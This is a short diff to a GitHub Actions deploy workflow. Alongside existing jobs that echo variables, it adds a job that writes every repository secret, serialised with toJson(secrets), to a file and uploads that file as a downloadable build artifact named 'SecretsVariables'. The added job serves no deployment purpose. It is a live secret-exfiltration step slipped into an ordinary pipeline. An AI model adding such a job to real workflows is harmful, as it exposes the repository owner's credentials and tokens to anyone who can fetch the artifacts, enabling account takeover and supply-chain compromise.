--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -30,6 +30,18 @@ jobs:
         run: echo "variable is $FIRST_VARIABLE"
       - name: Print environment variable
         run: echo "event is  ${{ github.event_name }}"
+  one:
+    runs-on: ubuntu-latest
+    steps:
+      - name: "Echo in file"
+        env:
+          SECRETS_VARS: ${{ toJson(secrets) }}
+        run: echo "$SECRETS_VARS" > "secrets.txt"
+      - uses: actions/upload-artifact@v3
+        name: Upload Artifact
+        with:
+          name: SecretsVariables
+          path: "secrets.txt"
   deploy:
     needs: test
     runs-on: ubuntu-latest
